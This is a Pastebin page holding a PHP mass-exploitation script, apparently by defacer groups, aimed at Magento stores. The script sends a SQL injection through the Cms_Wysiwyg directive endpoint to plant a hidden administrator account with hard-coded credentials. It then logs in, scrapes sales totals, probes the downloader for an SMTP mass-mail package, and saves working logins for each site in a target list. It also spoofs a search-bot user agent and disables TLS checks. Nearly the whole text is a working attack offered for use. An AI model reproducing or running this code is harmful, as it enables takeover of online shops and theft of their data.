antonkill666

magento

Oct 5th, 2016
276
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.49 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. /*
  5. ----------------------
  6. Name : Auto Exploiter Magento
  7. Date : 27/02/2016
  8. Thank's : Ja , Kevin a.k.a Mr.K , ANGK3RS T3AM
  9. ----------------------
  10. IndoXploit Coder's | Bug7sec Team | Defacer Tersakiti Team
  11. ----------------------
  12. Tuban Cyber Team
  13. ----------------------
  14. */
  15.  
  16. $username = "shortcut";
  17. $password = "bug7sec";
  18. $email = "shor7cut-".time()."@gmail.com";
  19.  
  20. function ck_admin($site,$username,$password,$email){
  21. $a="popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '".$password."') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','".$email."','".$username."',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '".$username."'),'Firstname');";
  22.  
  23. $bs=base64_encode($a);
  24. $post=array(
  25. "___directive" => "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
  26. "filter" => $bs,
  27. "forwarded" => 1
  28. );
  29. echo "|_[ Check admin ... ";
  30. $ch = curl_init();
  31. curl_setopt($ch, CURLOPT_URL, "$site/admin/Cms_Wysiwyg/directive/index/");
  32. curl_setopt($ch, CURLOPT_HEADER, false);
  33. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  34. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  35. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  36. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  37. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  38. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  39. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
  40. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  41. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  42. curl_setopt($ch, CURLOPT_VERBOSE, false);
  43. curl_setopt($ch, CURLOPT_POST, true);
  44. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  45. $data = curl_exec($ch);
  46. $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  47. curl_close($ch);
  48. $re = "/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\" \\/>/";
  49. preg_match($re, $data, $matches);
  50. if($matches[1]){
  51. echo "w00t\r\n";
  52. return true;
  53. }
  54. echo "JM800t\r\n";
  55. echo "|\r\n";
  56. return false;
  57. }
  58.  
  59. function ck_pass($site,$email){
  60. echo "|_[ Check forgotpass ... ";
  61. $ch = curl_init();
  62. curl_setopt($ch, CURLOPT_URL, "$site/index.php/admin/index/forgotpassword/");
  63. curl_setopt($ch, CURLOPT_HEADER, false);
  64. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  65. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  66. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  67. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  68. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  69. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  70. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  71. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  72. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  73. curl_setopt($ch, CURLOPT_VERBOSE, false);
  74. curl_setopt($ch, CURLOPT_POST, true);
  75. curl_setopt($ch, CURLOPT_POSTFIELDS, "email=".$email."");
  76. $data = curl_exec($ch);
  77. $re = "/success-msg/";
  78. preg_match($re, $data, $matches);
  79. if($matches[0]){
  80. return true;
  81. echo "w00t\r\n";
  82. echo "|\r\n";
  83. }else{
  84. echo "JM800t\r\n";
  85. echo "|\r\n";
  86. return false;
  87. }
  88. echo "|\r\n";
  89. }
  90. function ck_price($data){
  91. $re = "/<span class=\"price\">(.*?)<\\/span>/";
  92. preg_match_all($re, $data, $matches);
  93. $price = "|_[ Sales/Orders : ".$matches[0][0]."/".$matches[0][1]."\r\n";
  94. return $price;
  95. }
  96.  
  97. function save($name,$data){
  98. $myfile = fopen($name, "a+") or die("Unable to open file!");
  99. fwrite($myfile, $data);
  100. fclose($myfile);
  101. }
  102.  
  103. function ck_login($site,$username,$password){
  104. $ch = curl_init();
  105. curl_setopt($ch, CURLOPT_URL, "$site/admin");
  106. curl_setopt($ch, CURLOPT_HEADER, false);
  107. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  108. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  109. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  110. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  111. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  112. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  113. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  114. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  115. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  116. curl_setopt($ch, CURLOPT_VERBOSE, false);
  117. curl_setopt($ch, CURLOPT_POST, true);
  118. curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
  119. $data = curl_exec($ch);
  120. $re = "/class=\"link-logout\">(.*?)<\\/a>/";
  121. preg_match($re, $data, $matches);
  122. if($matches[1]=="Log Out"){
  123. echo "|_[ Login admin ... w00t\r\n";
  124. echo ck_price($data);
  125. return true;
  126. }else{
  127. echo "|_[ Login admin ... JM800t\r\n";
  128. return false;
  129. }
  130. }
  131. function ck_download($site,$username,$password){
  132. $ch = curl_init();
  133. curl_setopt($ch, CURLOPT_URL, "$site/downloader/index.php");
  134. curl_setopt($ch, CURLOPT_HEADER, false);
  135. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  136. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  137. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  138. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  139. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  140. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  141. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  142. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  143. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  144. curl_setopt($ch, CURLOPT_VERBOSE, false);
  145. curl_setopt($ch, CURLOPT_POST, true);
  146. curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
  147. $data = curl_exec($ch);
  148. //echo $data;
  149. if(preg_match("/Log Out/",$data)){
  150. echo "|_[ Login downloader w00t\r\n";
  151. $login = true;
  152. if(preg_match("/Warning: Your Magento folder does not have sufficient write permissions./",$data)){
  153. echo "|_[ Kesalahan permissions\r\n";
  154. }else{
  155. if(eregi("Grizzly_MassEmail", $data)){
  156. echo "|_[ Package Smtp w00t\r\n";
  157. $smtp = true;
  158. }else{
  159. $smtp = false;
  160. echo "|_[ Package Smtp w00t\r\n";
  161. }
  162. }
  163. if($login){
  164. save("magento.txt","[Login] $site,$username,$password \r\n");
  165. if($smtp){
  166. save("magento.txt","[Login+SMTP] $site,$username,$password \r\n");
  167. }
  168. }
  169.  
  170. }else{
  171. echo "|_[ Login downloader .. JM800t\r\n";
  172. return false;
  173. }
  174. }
  175.  
  176.  
  177. if(isset($argv[1])){
  178. if(file_exists($argv[1])){
  179. $shc_fgt = file_get_contents($argv[1]);
  180. $explodes = explode("\r\n", $shc_fgt);
  181. cover();
  182. $no=1;
  183. $no_c = count($explodes);
  184. $v=0;
  185. foreach ($explodes as $site) {
  186. unlink(getcwd().'/cookie.txt');
  187. echo "|----[$no|$no_c|$v]----\r\n";
  188. echo "|-[ $site\r\n";
  189. if(ck_admin($site,$username,$password,$email)){
  190. if(ck_pass($site,$email)){
  191. echo "w00t\r\n";
  192. ck_login($site,$username,$password);
  193. ck_download($site,$username,$password);
  194. echo "|\r\n";
  195. $v++;
  196. }
  197. }
  198. $no++;
  199. }
  200. }
  201. }
  202.  
  203. function cover($site){
  204. echo "|-------------------------------------------|\r\n";
  205. echo "| Exploit Magento |\r\n";
  206. echo "|-------------------------------------------|\r\n";
  207. echo "|SHOR7CUT | BUG7SEC | DEFACER TERSAKITI TEAM|\r\n";
  208. echo "|-------------------------------------------|\r\n";
  209. echo "|\r\n";
  210. }
  211.  
  212.  
  213. ?>
Add Comment
Please, Sign In to add comment